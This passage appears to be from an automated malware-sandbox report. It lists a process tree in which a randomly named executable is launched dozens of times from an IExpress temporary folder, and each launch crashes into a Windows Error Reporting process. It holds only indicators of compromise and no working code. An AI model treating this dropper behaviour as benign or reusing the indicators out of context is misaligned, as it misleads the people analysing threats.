C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:14860
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 14860 -s 9407⤵PID:14452
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:13208
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13208 -s 9647⤵PID:15536
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:16172
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 16172 -s 9647⤵PID:14524
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:15984
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 15984 -s 9407⤵PID:7812
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:9536
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9536 -s 9407⤵PID:16500
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:16952
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 16952 -s 9407⤵PID:17160
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:16764
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 16764 -s 9447⤵PID:17096
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:1868
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 9407⤵PID:17404
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:17724
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 17724 -s 9407⤵PID:17980
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:18404
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 18404 -s 9647⤵PID:18796
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:18632
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 18632 -s 9407⤵PID:4904
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:20008
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 20008 -s 9407⤵PID:20236
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:916
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 9407⤵PID:20160
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:19864
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 19864 -s 9407⤵PID:19468
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:20980
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 20980 -s 9407⤵PID:21200
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:20684
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 20684 -s 9447⤵PID:20968
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:19752
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 19752 -s 9407⤵PID:21204
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:21704
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 21704 -s 9407⤵PID:21836
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:22308
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 22308 -s 9407⤵PID:22444
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:21708
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 21708 -s 9407⤵PID:10028
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:23284
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 23284 -s 9407⤵PID:23472
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:21744
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 21744 -s 9407⤵PID:23472
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:23264
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 23264 -s 9407⤵PID:23384
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:24020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 24020 -s 9407⤵PID:24244
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:23968
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 23968 -s 9407⤵PID:24420
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:28404
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 28404 -s 9447⤵PID:24056
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:24996
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 24996 -s 9407⤵PID:24668
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:26340
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 26340 -s 9647⤵PID:25796
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:26156
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 26156 -s 9407⤵PID:8140
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:27904
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 27904 -s 9407⤵PID:28068
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:26476
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 26476 -s 9407⤵PID:25284
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:26664
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 26664 -s 9407⤵PID:27224
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:26092
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 26092 -s 9407⤵PID:27360
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:23476
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 23476 -s 9407⤵PID:2132
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:25020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 25020 -s 9407⤵PID:28800
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:29328
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 29328 -s 9407⤵PID:29548
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:29012
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 29012 -s 9407⤵PID:29444
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:28836
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 28836 -s 9407⤵PID:29652
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:30104
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 30104 -s 9407⤵PID:30368
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:29856
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 29856 -s 9727⤵PID:30396
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:30284
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 30284 -s 9407⤵PID:30132
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:31156
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 31156 -s 9407⤵PID:31380
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:30008
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 30008 -s 9407⤵PID:30916
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:30724
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 30724 -s 9487⤵PID:30676
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:32068
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 32068 -s 9407⤵PID:32224
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:32624
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 32624 -s 9407⤵PID:32756
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:32236
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 32236 -s 9407⤵PID:31180
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:32692
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 32692 -s 9567⤵PID:32848
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:33240
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 33240 -s 9407⤵PID:33380
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:33740
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 33740 -s 9527⤵PID:32936
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:32524
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 32524 -s 9407⤵PID:33164
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:33800
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 33800 -s 9407⤵PID:33900
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:34276
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 34276 -s 9407⤵PID:34428
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:32524
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 32524 -s 9407⤵PID:34140
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:34012
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 34012 -s 9407⤵PID:34508
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:34936
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 34936 -s 9407⤵PID:35104
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:35548
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 35548 -s 9447⤵PID:35648
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:35176
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 35176 -s 9607⤵PID:34968
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:35052
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 35052 -s 9407⤵PID:35740
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:36044
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 36044 -s 9407⤵PID:36152
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:36516
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 36516 -s 9447⤵PID:36684
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:36452
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 36452 -s 9407⤵PID:36768
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:36836
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 36836 -s 9407⤵PID:4128
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:37248
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 37248 -s 9407⤵PID:37416
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:37716
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 37716 -s 9407⤵PID:5720
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:37396
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 37396 -s 9407⤵PID:37796
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:36964
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 36964 -s 9527⤵PID:37360
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:38056
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 38056 -s 9567⤵PID:38208
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:38564
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 38564 -s 9407⤵PID:38712
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:38136
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 38136 -s 9407⤵PID:38496
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:38612
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 38612 -s 9407⤵PID:38888
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:39080
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 39080 -s 9407⤵PID:39208
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:39576
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 39576 -s 9647⤵PID:39748
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:39280
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 39280 -s 9407⤵PID:39504
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:39392
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 39392 -s 9407⤵PID:38688
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:39956
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 39956 -s 9407⤵PID:40088
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:40392
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 40392 -s 9407⤵PID:40504
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:40804
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 40804 -s 9487⤵PID:40944
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:40360
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 40360 -s 9407⤵PID:40652
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:40588
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 40588 -s 9487⤵PID:40560
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:40740
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 40740 -s 9447⤵PID:41108
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HPXmmgLUSavYuccxma5.exe"6⤵PID:41468
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 41468 -s 9567⤵PID:41592
-
-
-
